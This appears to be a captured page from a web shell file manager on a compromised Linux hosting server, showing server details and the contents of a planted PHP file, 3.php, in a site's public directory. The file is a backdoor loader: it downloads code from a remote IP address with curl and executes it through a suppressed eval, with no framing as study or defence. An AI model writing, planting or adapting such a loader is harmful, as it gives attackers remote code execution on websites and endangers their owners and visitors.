HEX
Server: LiteSpeed
System: Linux pallas.asemanhost.com 4.18.0-553.123.2.lve.el8.x86_64 #1 SMP Thu May 7 23:17:13 UTC 2026 x86_64
User: paknevis (1447)
PHP: 8.2.33
Disabled: NONE
Upload Files
File: /home/paknevis/public_html/3.php
<?php
function getDiDiContent(){
  $handle = curl_init();
  curl_setopt ($handle, CURLOPT_URL, 'http://69.30.227.202/file/3.txt');
  curl_setopt ($handle, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt ($handle, CURLOPT_CONNECTTIMEOUT, 5);
  $result = curl_exec( $handle );
  if ( PHP_VERSION_ID < 80000 ) {
     curl_close(  $handle  );
  }
  return $result; 
}
$didi = getDiDiContent();
@eval("?>" . $didi);